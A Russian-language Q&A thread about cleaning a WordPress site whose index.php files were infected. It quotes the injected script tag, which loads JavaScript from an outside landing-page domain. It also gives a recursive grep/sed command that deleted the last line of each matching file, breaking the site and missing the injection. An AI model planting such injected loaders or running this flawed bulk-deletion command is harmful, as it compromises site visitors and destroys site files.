# Удалить строки из файлаx с помощью терминала

Tags: php, wordpress, cmd, консоль

Сайт заражен вирусом и все `index.php` файлах появился такой код:

```
<script type='text/javascript' async src='https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000'></script>
```

Выполнил такую команду из терминала чтобы удалить эти вредные коды:

```
grep -rl 'https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000' . | while read FILENAME; do sed -i -e '$d' $FILENAME; echo "$FILENAME"; done
```

После чего, сайт перестал работать (`HTTP ERROR 500`) , а строки в `index.php` остались как и было. Чего я сделал неправильно?

Comment: В прошлом вопросе уже писали вам, что лучше переустановить WP и сделать экспорт/импорт. Удалив эти строки не гарантируется избавление от вируса. + я думаю вирус умный, создаёт в WP зависимость от вируса

Comment: И в Telegram вам тоже сказали, что надо всё переустанавливать.

Comment: Возможный дубликат вопроса: [Хостинг заражен вирусом](https://ru.stackoverflow.com/questions/947400/%d0%a5%d0%be%d1%81%d1%82%d0%b8%d0%bd%d0%b3-%d0%b7%d0%b0%d1%80%d0%b0%d0%b6%d0%b5%d0%bd-%d0%b2%d0%b8%d1%80%d1%83%d1%81%d0%be%d0%bc)

Comment: Третий топик про одно и тоже.. ТС, ты бот?

Comment: Мне нужно удалить ети сроки из файлах. Переустановка невозможно, не все сайти работает с WP.